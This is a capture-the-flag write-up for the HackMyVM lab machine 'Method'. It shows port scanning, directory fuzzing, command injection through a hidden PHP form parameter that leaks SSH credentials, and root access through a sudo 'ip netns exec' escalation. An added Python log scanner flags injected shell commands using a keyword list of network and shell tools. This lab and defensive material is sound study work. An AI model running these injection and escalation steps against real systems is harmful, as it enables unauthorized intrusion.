NOTES ABOUT Method

[ 2022-10-23 ] [ HackMyVM / Method ]

Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, Sudo
Tools: nmap, ssh, gobuster, curl, sudo ip

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.37

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
| 256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
|_ 256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Test Page for the Nginx HTTP Server on Fedora
|_http-server-header: nginx/1.18.0

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.37 --exclude-length 3690
/index.htm (Status: 200) [Size: 344]
/sitemap.xml (Status: 200) [Size: 285]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]

$ curl 10.0.2.37/sitemap.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="https://hackmyvm/sitemap/0.9">
<url>
<loc>https://hackmyvm.eu/machines/index.htm?vm=Brain</loc>
<lastmod>2020-02-13</lastmod>
<changefreq>monthly</changefreq>
<priority>0.8</priority>
</url>
</urlset>

$ curl 10.0.2.37/index.htm?vm=Brain
<h1>It's Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>

$ curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
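
The injection above runs whatever is passed in the HackMyVM parameter as www-data. Below is a small detector over constructed nginx access-log lines, added here as an example and not part of the original writeup; the sample log lines and the keyword list are assumptions, while the path /secret.php and the parameter name come from the page. The samples use the GET form the page's HTML form declares, since nginx's default access log does not record POST bodies like the curl call above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx access-log lines (combined format); not taken from the original writeup.
SAMPLE_LOG = """\
10.0.2.15 - - [23/Oct/2022:14:01:02 +0000] "GET /index.htm?vm=Brain HTTP/1.1" 200 344 "-" "curl/7.85.0"
10.0.2.15 - - [23/Oct/2022:14:01:09 +0000] "GET /secret.php?HackMyVM=id HTTP/1.1" 200 118 "-" "curl/7.85.0"
10.0.2.15 - - [23/Oct/2022:14:01:15 +0000] "GET /secret.php?HackMyVM=cat%20secret.php HTTP/1.1" 200 640 "-" "curl/7.85.0"
10.0.2.15 - - [23/Oct/2022:14:02:00 +0000] "GET /secret.php?HackMyVM=hello HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters, plus a (assumed) list of recon commands such as the "id" and "cat" seen above.
META_RE = re.compile(r'[;&|`$<>\\]')
CMD_RE = re.compile(r'^\s*(id|cat|ls|whoami|uname|wget|curl|nc|bash|sh|python\d?)\b')


def suspicious_params(target, param="HackMyVM"):
    """Return the decoded values of `param` in one request target that look like shell input."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
    return [v for v in values if META_RE.search(v) or CMD_RE.match(v)]


def scan_log(text, path="/secret.php"):
    """Return (ip, timestamp, value) for every flagged request to `path` in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("target").startswith(path):
            continue
        for value in suspicious_params(m.group("target")):
            findings.append((m.group("ip"), m.group("ts"), value))
    return findings


if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} -> {value!r}")
```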

ELEVATING PRIVILEGES

$ curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=cat secret.php'
You Found ME : - (<pre><?php
[...]
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>

$ ssh prakasaka@10.0.2.37
prakasaka@10.0.2.37's password:

prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip

prakasaka@method:~$ cat user.txt
********************

prakasaka@method:~$ sudo /bin/ip netns add foo
prakasaka@method:~$ sudo /bin/ip netns exec foo /bin/bash

root@method:~# cat root.txt
********************

root@method:~# init 0
root@method:~# Connection to 10.0.2.37 closed by remote host.
Connection to 10.0.2.37 closed.
